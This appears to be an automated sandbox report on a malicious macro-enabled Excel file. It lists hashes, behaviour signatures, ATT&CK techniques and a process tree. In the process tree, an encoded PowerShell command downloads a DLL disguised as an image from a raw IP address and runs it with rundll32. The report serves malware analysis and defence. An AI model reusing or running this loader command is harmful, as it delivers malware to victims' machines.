Analysis

  • max time kernel
    118s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    14-10-2021 18:06

General

  • Target

    doc2_5.xlsm

  • Size

    130KB

  • MD5

    bb9509e3a758f80aba854fbf3f1fb7be

  • SHA1

    45389b76ed4ad5d41205b754775de4f9f3fd1076

  • SHA256

    6cdc36e5c8774b62bbeeaa2141af5fd3c9c5ca33e0197e6301f76f23e59e9e22

  • SHA512

    c11c2e545ca8d092c772a8d2bda01bb82be89b81f2ac3c0d2e478972b5606ed8405fc350d993434cd4023b4ff958dd83e470f89d3726a144de766ba5cbc550e7

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\doc2_5.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1540
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B /MIN /WAIT powershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEAOQA1AC4AMQAzADMALgAxADkAMgAuADEAMAAxAC8AaQBtAGEAZwBlAHMALwByAGUAZABwAGwAYQBuAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1740
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -enc IABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvADEAOQA1AC4AMQAzADMALgAxADkAMgAuADEAMAAxAC8AaQBtAGEAZwBlAHMALwByAGUAZABwAGwAYQBuAGUALgBwAG4AZwAiACAALQBPAHUAdABGAGkAbABlACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYgAuAGQAbABsACIA
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1460
      • C:\Windows\SysWOW64\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,gigi
        3⤵
          PID:1968

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1460-62-0x0000000002251000-0x0000000002252000-memory.dmp
      Filesize

      4KB

    • memory/1460-58-0x0000000000000000-mapping.dmp
    • memory/1460-59-0x0000000076B61000-0x0000000076B63000-memory.dmp
      Filesize

      8KB

    • memory/1460-61-0x0000000002250000-0x0000000002251000-memory.dmp
      Filesize

      4KB

    • memory/1460-65-0x0000000002252000-0x0000000002254000-memory.dmp
      Filesize

      8KB

    • memory/1540-54-0x0000000071B41000-0x0000000071B43000-memory.dmp
      Filesize

      8KB

    • memory/1540-55-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1540-56-0x000000000014F000-0x0000000000153000-memory.dmp
      Filesize

      16KB

    • memory/1540-60-0x0000000005970000-0x0000000005972000-memory.dmp
      Filesize

      8KB

    • memory/1540-53-0x000000002F111000-0x000000002F114000-memory.dmp
      Filesize

      12KB

    • memory/1540-66-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1740-57-0x0000000000000000-mapping.dmp
    • memory/1968-63-0x0000000000000000-mapping.dmp